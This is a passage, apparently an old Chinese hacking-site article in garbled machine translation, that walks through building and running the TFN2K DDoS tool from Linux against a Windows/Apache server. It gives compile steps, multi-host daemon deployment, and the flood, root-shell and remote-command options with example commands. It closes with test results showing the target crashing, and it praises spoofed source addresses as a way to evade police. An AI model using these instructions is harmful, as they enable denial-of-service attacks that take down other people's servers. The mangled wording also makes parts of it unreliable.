The use of LINUX systems with DDOS attacks for WINDOWS servers-vulnerability warning-the black bar safety net

ID MYHACK58:62200612500
Type myhack58
Reporter 佚名
Modified 2006-10-25T00:00:00


Use the moment the most famous of the REDHAT LINUX test,the present attack test I'm using FEDORA CORE3 ,software is the most famousDDOSattack tool TFN2K LINUX version,is to attack the WINDOWS Server system is using Windows 2000 Server service open APACHE2 FTP VNC little relationship,mainly to attack the APACHE

  1. Decompression tar-zxvf tfn2k. tgz
  2. Install TFN2K TFN2K is an open source code software,so we need to compile,this needless to say,the compiler should will the right,but has Several places is necessary to note that,because of the use of different versions and vendors of LINUX require different settings. Modify the src/ip. h Comment out the following section, otherwise compile error.

/struct in_addr { unsigned long int server_address; };/ Then make to compile When compiling you will be prompted to input the server password settings 8-3 2,(attack when need to enter password)after compilation will be out Now two new files td and tfn,wherein td is the daemon,is also the client's use of the process,and tfn is the server Control process,if you want to attack someone you must first start td this process,and then run the server process,otherwise the attack is invalid, Change password you can perform mkpass be changed,finally, in all of the client install and run td(needs ROOT rights Limit),and on the server create a text file,the file records all of the Client IP address(using VI to edit a Feasible),in the format: IP IP ..... And then running on the primary server./ tfn 2. Attack ./ tfn directly to the carriage return you can see some of the parameters,the English good friends estimated I don't need to speak more:) Format./ tfn <parameter> Useless parameter we do not mention,we have to attack with the -f this parameter followed by just the written text of the file name,is the real achievement ofDDOSattacks,and not DOS -h DOS attack,i.e. a single machine,one-on-one attack followed by a host or IP address -p later to specify a port,needless to say. -c the most critical parameters,a total of 1 1 selected phase 0 - to stop the attack,so kind of 1 - anti-spoofing level is set ,because TFN this tool in the attack when the packet sent with a source address,but The source address is random,that is to say the address is not your self-sufficiency,so don't worry about cops,haha 2 - adaptation of the packet size: the default ICMP/8,smurf,udp attacks default to use the pouch. You can by Change for each packet of payload bytes increases the size of it. 3 - bind root shell:start a session service, then you are connected to a specified port you can get a root shell. 4 - UDP flood attack: this attack is the use of such a fact: each udp packet sent to a closed port, the So there will be an ICMP unreachable information is returned, increase the attack ability. 5 - SYN flood attack: this attack has regularly sent false connection requests. The result will be the target port denial of service, Tim hide it from the TCP connection table, by the absence of the host TCP/RST responses to increase the attack potential,is the standard denial of service attack Click the. 6 - ICMP response(ping)attack: this attack sends a false address of the ping request, the target host will send back the same The size of the response packet. 7 - SMURF attack: the target host address to send the ping request to the broadcast to expand, so that the target host will get back to Covered a lot of times the reply. 8 - MIX attack: in a 1:1:1 relationship of alternating sends udp,syn,icmp packet, so that you can deal with the routing Device, the other packet forwarding devices, NIDS,sniffers, etc., turns to bombing:) 9 - TARGA3 attack 1 0 - remote command execution,this parameter is the TFN of the additional features,in fact, the TFN attack is not only DOS,but also can Remote of for explicit control,such as: ./ tfn-f hostext-c 1 0-i "mkdir /root/edison" in all of the HOST on the root home directory is established edison,-i followed the"command" Parameters of the basic finished,the following attack ./ tfn-f hostext-c 4-i Use hostext file records the host pair 1 6 3 server for a UDP attack(all of the hosts must have been starting td process) ./ tfn-f hostext-c 5-i -p 8 0 Use hostext file records the host pair 1 6 3 Server TCP denial of service attacks(8 0 attack WEB,other Needless to say.) ./ tfn-f hostext-c 6-i Use hostext file records the host pair 1 6 3 server for ICMP attacks(PING attacks,and buffer overflow immediately Crash) ./ tfn-f hostext-c 8-i Use hostext file records the host pair 1 6 3 server for ICMP&TCP&UDP turns to attack(if the other Is sniffer a certain cry of the dead) ./ tfn-f hostext-c 0 Let the by the host to stop the attack

Test results: One-on-one attack,the attack TCP connection local CPU13% is attacking the server CPU usage 7 0% The above,and from time to time fluctuations Two on one attack,the attack TCP connection local single CPU13% is attacking the server CPU usage 1 0 0% Five against one attack,the attack TCP connection local single CPU13% is attack the server crash Own home only 6 machines,but if another point,dozens of machine,generally the personal server is definitely dying off. One-on-one attacks,attack ICMP connection mode local local CPU18% is attacking the server CPU usage 9 6% or more,and are always fluctuations Two on one attack,attack ICMP connection mode local local single-machine CPU18% hacked server by not on Network,almost impossible to use,half an hour within the crash